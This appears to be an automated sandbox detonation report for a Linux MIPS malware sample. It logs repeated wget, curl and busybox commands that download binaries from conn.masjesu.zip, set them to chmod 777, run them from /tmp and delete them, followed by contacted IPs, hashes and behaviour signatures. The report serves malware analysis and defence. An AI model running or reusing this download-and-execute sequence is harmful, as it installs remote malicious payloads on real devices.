[rm i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]
/bin/chmod
[chmod 777 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]
/tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb
[./Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]
/bin/rm
[rm Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]
/bin/chmod
[chmod 777 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]
/tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I
[./jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]
/bin/rm
[rm jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]
/bin/chmod
[chmod 777 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]
/tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc
[./Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]
/bin/rm
[rm Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]
/bin/chmod
[chmod 777 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]
/tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa
[./Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]
/bin/rm
[rm Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]
/bin/chmod
[chmod 777 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]
/tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj
[./ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]
/bin/rm
[rm ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
/bin/chmod
[chmod 777 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH
[./07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
/bin/rm
[rm 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]
/bin/chmod
[chmod 777 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]
/tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF
[./XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]
/bin/rm
[rm XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]
/bin/chmod
[chmod 777 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]
/tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG
[./He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]
/bin/rm
[rm He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]
/bin/chmod
[chmod 777 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]
/tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS
[./cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]
/bin/rm
[rm cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]
/bin/chmod
[chmod 777 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]
/tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c
[./mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]
/bin/rm
[rm mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]
/bin/chmod
[chmod 777 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]
/tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk
[./HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]
/bin/rm
[rm HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
Files
/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-28 02:44
Reported
2024-10-28 02:47
Platform
debian9-mipsel-20240226-en
Max time kernel
150s
Max time network
154s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH | /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH | N/A |
| N/A | /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF | /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF | N/A |
| N/A | /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG | /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG | N/A |
| N/A | /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS | /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS | N/A |
| N/A | /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj | /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj | N/A |
| N/A | /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c | /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c | N/A |
| N/A | /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk | /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk | N/A |
| N/A | /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN | /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN | N/A |
| N/A | /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v | /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v | N/A |
| N/A | /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb | /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb | N/A |
| N/A | /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I | /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I | N/A |
| N/A | /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 | /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 | N/A |
| N/A | /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc | /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc | N/A |
| N/A | /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa | /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa | N/A |
| N/A | /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 | /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 | N/A |
| N/A | /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN | /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN | N/A |
| N/A | /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v | /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v | N/A |
| N/A | /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb | /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb | N/A |
| N/A | /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I | /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I | N/A |
| N/A | /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc | /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc | N/A |
| N/A | /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa | /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa | N/A |
| N/A | /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj | /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj | N/A |
| N/A | /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH | /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH | N/A |
| N/A | /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF | /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF | N/A |
| N/A | /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG | /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG | N/A |
| N/A | /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS | /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
